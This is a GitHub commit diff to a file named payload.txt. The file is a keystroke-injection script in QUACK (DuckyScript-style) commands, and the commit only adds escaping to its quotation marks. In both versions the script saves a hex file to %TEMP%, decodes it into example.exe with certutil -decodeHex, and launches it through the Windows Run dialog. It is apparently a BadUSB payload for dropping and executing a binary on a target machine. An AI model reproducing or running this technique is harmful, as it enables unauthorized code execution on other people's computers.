Update payload.txt

pull/638/head
Aleff 2024-06-09 12:11:48 +02:00 committed by GitHub
parent 12c59757b9
commit a0f4907e91
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 3 additions and 3 deletions

View File

@ -33,7 +33,7 @@ QUACK ALT F
QUACK DELAY 1000
QUACK STRING S
QUACK DELAY 1000
QUACK STRING "%TEMP%\example.hex"
QUACK STRING \"%TEMP%\example.hex\"
QUACK ENTER
QUACK DELAY 1000
QUACK ENTER
@ -42,12 +42,12 @@ QUACK ALT F4
QUACK DELAY 2000
QUACK GUI r
QUACK DELAY 500
QUACK STRING certutil -f -decodeHex "%TEMP%\example.hex" "%TEMP%\example.exe"
QUACK STRING certutil -f -decodeHex \"%TEMP%\example.hex\" \"%TEMP%\example.exe\"
QUACK ENTER
QUACK DELAY 1000
QUACK ENTER
QUACK DELAY 1000
QUACK GUI r
QUACK DELAY 250
QUACK STRING "%TEMP%\example.exe"
QUACK STRING \"%TEMP%\example.exe\"
QUACK ENTER